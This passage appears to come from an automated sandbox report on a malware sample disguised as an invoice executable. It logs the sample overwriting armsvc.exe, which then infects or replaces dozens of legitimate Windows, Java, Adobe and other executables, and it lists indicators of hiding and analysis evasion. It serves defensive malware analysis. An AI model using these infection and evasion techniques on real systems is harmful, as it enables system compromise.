      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Java\jre1.8.0_121\bin\rmid.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Windows\System32\ieetwcollector.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Windows\System32\snmptrap.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Windows Media Player\wmpnetwk.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Windows\System32\Locator.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32Info.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Java\jre1.8.0_121\bin\java-rmi.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Windows\SysWOW64\perfhost.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Windows\System32\msiexec.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Java\jre1.8.0_121\bin\javacpl.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Java\jre1.8.0_121\bin\kinit.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Java\jre1.8.0_121\bin\javaw.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Windows\System32\VSSVC.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Windows\System32\wbengine.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Java\jre1.8.0_121\bin\ktab.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Java\jre1.8.0_121\bin\tnameserv.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Java\jre1.8.0_121\bin\jp2launcher.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Windows\System32\SearchIndexer.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files (x86)\Google\Chrome\Application\109.0.5414.120\elevation_service.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Java\jre1.8.0_121\bin\policytool.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Windows\ehome\ehrecvr.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Java\jre1.8.0_121\bin\keytool.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Java\jre1.8.0_121\bin\java.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Java\jre1.8.0_121\bin\javaws.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Java\jre1.8.0_121\bin\orbd.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Windows\System32\dllhost.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Java\jre1.8.0_121\bin\jjs.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\FXSSVC.exeJump to behavior
      Source: C:\Users\user\Desktop\invoice_96.73.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Java\jre1.8.0_121\bin\servertool.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Java\jre1.8.0_121\bin\unpack200.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\sppsvc.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\CCleaner\CCleaner.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\msdtc.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Java\jre1.8.0_121\bin\klist.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Java\jre1.8.0_121\bin\pack200.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Java\jre1.8.0_121\bin\rmiregistry.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\MSOCache\All Users\{90140000-003D-0000-1000-0000000FF1CE}-C\setup.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\wbem\WmiApSrv.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\CCleaner\CCleaner64.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Java\jre1.8.0_121\bin\ssvagent.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\ehome\ehsched.exeJump to dropped file
      Source: C:\Users\user\Desktop\invoice_96.73.exeFile created: C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Java\jre1.8.0_121\bin\jabswitch.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\vds.exeJump to dropped file
      Source: C:\Users\user\Desktop\invoice_96.73.exeFile created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exeJump to dropped file
      Source: C:\Users\user\Desktop\invoice_96.73.exeFile created: C:\Windows\System32\alg.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Java\jre1.8.0_121\bin\rmid.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\ieetwcollector.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\snmptrap.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Windows Media Player\wmpnetwk.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\Locator.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32Info.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Java\jre1.8.0_121\bin\java-rmi.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\SysWOW64\perfhost.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\msiexec.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\MSOCache\All Users\{90140000-0115-0409-1000-0000000FF1CE}-C\dwtrig20.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXEJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Java\jre1.8.0_121\bin\javacpl.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Java\jre1.8.0_121\bin\kinit.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Java\jre1.8.0_121\bin\javaw.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\VSSVC.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\wbengine.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Java\jre1.8.0_121\bin\ktab.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Java\jre1.8.0_121\bin\tnameserv.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Java\jre1.8.0_121\bin\jp2launcher.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\SearchIndexer.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Google\Chrome\Application\109.0.5414.120\elevation_service.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Java\jre1.8.0_121\bin\policytool.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\ehome\ehrecvr.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Java\jre1.8.0_121\bin\keytool.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Java\jre1.8.0_121\bin\java.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Java\jre1.8.0_121\bin\javaws.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Java\jre1.8.0_121\bin\orbd.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\dllhost.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Java\jre1.8.0_121\bin\jjs.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\FXSSVC.exeJump to dropped file
      Source: C:\Users\user\Desktop\invoice_96.73.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Java\jre1.8.0_121\bin\servertool.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Java\jre1.8.0_121\bin\unpack200.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\MSOCache\All Users\{90140000-0115-0409-1000-0000000FF1CE}-C\DW20.EXEJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\MSOCache\All Users\{90140000-003D-0000-1000-0000000FF1CE}-C\ose.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\sppsvc.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\CCleaner\CCleaner.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\msdtc.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Java\jre1.8.0_121\bin\klist.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Java\jre1.8.0_121\bin\pack200.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Java\jre1.8.0_121\bin\rmiregistry.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\snmptrap.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\Locator.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\VSSVC.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\wbengine.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\wbem\WmiApSrv.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\SearchIndexer.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\ehome\ehsched.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\FXSSVC.exeJump to dropped file
      Source: C:\Users\user\Desktop\invoice_96.73.exeFile created: C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\vds.exeJump to dropped file
      Source: C:\Users\user\Desktop\invoice_96.73.exeFile created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exeJump to dropped file
      Source: C:\Users\user\Desktop\invoice_96.73.exeFile created: C:\Windows\System32\alg.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\SysWOW64\perfhost.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\msiexec.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\ehome\ehrecvr.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\sppsvc.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\msdtc.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\dllhost.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\ieetwcollector.exeJump to dropped file
      Source: C:\Windows\System32\msdtc.exeFile created: C:\Windows\DtcInstall.logJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ASP.NET_4.0.30319\NamesJump to behavior

      Hooking and other Techniques for Hiding and Protection

      Source: C:\Windows\System32\wbengine.exe | File created: C:\System Volume Information\WindowsImageBackup
      Source: C:\Users\user\Desktop\invoice_96.73.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\invoice_96.73.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\invoice_96.73.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\invoice_96.73.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\invoice_96.73.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe | Process information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      Source: C:\Users\user\Desktop\invoice_96.73.exe | API/Special instruction interceptor: Address: D4110C
      Source: armsvc.exe, 00000002.00000003.420558852.00000000020C0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: FHTTPHTTPSFILEUNKNOWN%LS\%LSSOFTWARE\MICROSOFT\WINDOWS SEARCH\TRACING\EVENTTHROTTLELASTREPORTEDSOFTWARE\MICROSOFT\WINDOWS SEARCH\TRACINGEVENTTHROTTLEMAXEVENTSEVENTTHROTTLEMAXCONTROLPERIODMSEVENTTHROTTLEBLOCKPERIODMSEVENTTHROTTLEFLUSHPERIODMSMSFTE.DLLMSTRACER.DLL
      Source: C:\Windows\System32\msdtc.exe | Window / User API: threadDelayed 401
      Source: C:\Windows\SysWOW64\perfhost.exe | Window / User API: threadDelayed 3816
      Source: C:\Windows\SysWOW64\perfhost.exe | Window / User API: threadDelayed 6182
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\MSOCache\All Users\{90140000-003D-0000-1000-0000000FF1CE}-C\setup.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Windows\System32\wbem\WmiApSrv.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files\Java\jre1.8.0_121\bin\ssvagent.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files\CCleaner\CCleaner64.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe
      Source: C:\Users\user\Desktop\invoice_96.73.exe | Dropped PE file which has not been started: C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
